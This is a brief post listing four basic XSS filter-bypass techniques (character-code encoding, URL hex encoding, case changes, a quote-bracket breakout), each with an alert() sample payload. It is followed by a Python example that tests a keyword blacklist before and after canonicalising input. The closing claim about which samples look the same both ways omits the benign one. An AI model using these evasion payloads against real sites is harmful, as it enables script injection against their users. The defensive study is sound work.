Four super basic bypass methods.
1. Convert to ASCII codes
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 39, 41)</script>
2. Convert to HEX (hexadecimal)
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%49%20%6c%6f%76%65%20%46%34%63%6b%27%29%3c%2f%73%63%72%69%70%74%3e
3. Change the case of the script
Example: the original script is <script>alert('I love F4ck')</script>
Converted to: <ScRipt>AleRt('I love F4ck')</sCRipT>
4. Add a closing mark ">
Example: the original script is <script>alert('I love F4ck')</script>
Converted to: "><script>alert('I love F4ck')</script>
For more detailed bypass techniques, see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
The conversion tool used is the HackBar Mozilla add-on for Firefox.
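An added example (not from the post and not HackBar's code) that looks at the four variants from the filter's side: a raw keyword blacklist misses three of them, while canonicalizing the input first (URL-decoding, expanding String.fromCharCode, lower-casing) catches all three. The fourth, the leading ">, is a context breakout rather than an encoding trick, so a canonicalizer does not change anything there; that one is addressed by output encoding, not by input matching. The sample strings are constructed from the payloads above.

```python
import re
from urllib.parse import unquote

# Constructed samples: the four variants from the post plus a benign string.
SAMPLES = {
    "plain": "<script>alert('I love F4ck')</script>",
    "charcode": "<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 73, 32, "
                "108, 111, 118, 101, 32, 70, 52, 99, 107, 39, 41)</script>",
    "urlhex": "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%49%20%6c%6f%76%65%20"
              "%46%34%63%6b%27%29%3c%2f%73%63%72%69%70%74%3e",
    "mixedcase": "<ScRipt>AleRt('I love F4ck')</sCRipT>",
    "closequote": "\"><script>alert('I love F4ck')</script>",
    "benign": "I love scripting in Python",
}

# A typical (hypothetical) blacklist: literal, case-sensitive keywords.
KEYWORDS = ("<script", "alert(")

def naive_hits(s):
    """Blacklist applied to the raw input: no decoding, no case folding."""
    return {k for k in KEYWORDS if k in s}

_CHARCODE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)", re.I)

def _expand_charcode(m):
    # Turn "97, 108, ..." back into the characters it spells out.
    return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())

def canonicalize(s):
    """Undo the encodings the post uses until the string stops changing,
    so a double-encoded input is unwrapped too, then fold case."""
    prev = None
    while prev != s:
        prev = s
        s = unquote(s)                        # %xx escapes (method 2)
        s = _CHARCODE.sub(_expand_charcode, s)  # fromCharCode (method 1)
    return s.lower()                          # case games (method 3)

def canonical_hits(s):
    """Same blacklist, but applied after canonicalization."""
    return {k for k in KEYWORDS if k in canonicalize(s)}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:10} raw={sorted(naive_hits(payload))} "
              f"canonical={sorted(canonical_hits(payload))}")
```

Running it prints, per variant, which keywords the raw check and the canonicalized check each see; only "closequote" and "plain" look the same both ways.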